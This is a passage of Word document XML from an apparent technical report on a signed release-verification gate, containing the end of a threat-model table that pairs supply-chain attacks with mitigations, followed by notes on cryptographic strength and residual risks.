          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Provenance: approved repo, tests passed, artifact digest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCKED / PROVENANCE_MISMATCH</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Storage bucket</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87"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Overwrite release with stolen HMAC key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Storage write = release authority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ed25519 signature decouples trust from storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HASH_MISMATCH / INVALID_SIGNATURE</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Private signing key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Info. disclosure → Spoofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1587"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Key leaked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Key in plain file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HSM/KMS (production), CRL revocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>REVOKED → BLOCK</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Signer identity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Spoofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1587"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sign with rogue key or fake signer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Any signature accepted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Allowed key IDs, trusted signers, trusted keystore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>UNAUTHORIZED_KEY</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Network channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Tampering, Info. disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1587"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Man-in-the-middle during download</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Plain HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>TLS 1.3 transport + signature check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Any change caught by signature/digest</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Old release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Tampering (replay)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1587"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Serve vulnerable older version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No version policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Revoked versions, minimum version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCKED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Manifest</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87"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Edit hash, version, timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unsigned metadata</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ed25519 over canonical manifest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>INVALID_SIGNATURE</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Audit evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Repudiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1587"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Deny a deployment happened</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No record</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SQLite audit log of every decision</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Logged and visible on dashboard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Gate availability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Denial of service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1587"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Break or skip verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Fail-open gate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Fail-closed: any error → BLOCK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No unverified deploy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>6.3 Strength of the Cryptography</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ed25519:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> about 128-bit security; forging a signature without the private key is computationally infeasible [5].</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SHA-256:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 128-bit collision resistance and 256-bit pre-image resistance [4].</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>TLS 1.3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> forward-secret ECDHE key exchange and AEAD ciphers; legacy algorithms removed [8].</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Canonical serialisation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> guarantees that the exact bytes signed are the bytes verified.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>6.4 Residual Risks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Stolen key before revocation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> until a leaked key is revoked, signatures made with it are valid. Mitigations are HSM/KMS storage, restricted signing access and fast revocation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Unsigned side files:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the provenance file and the CRL are plain JSON. The provenance's link to the artifact is checked (stage 6), but its other fields and the CRL are not signed, so an attacker with access to the customer's copy could alter them. Future work signs both.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
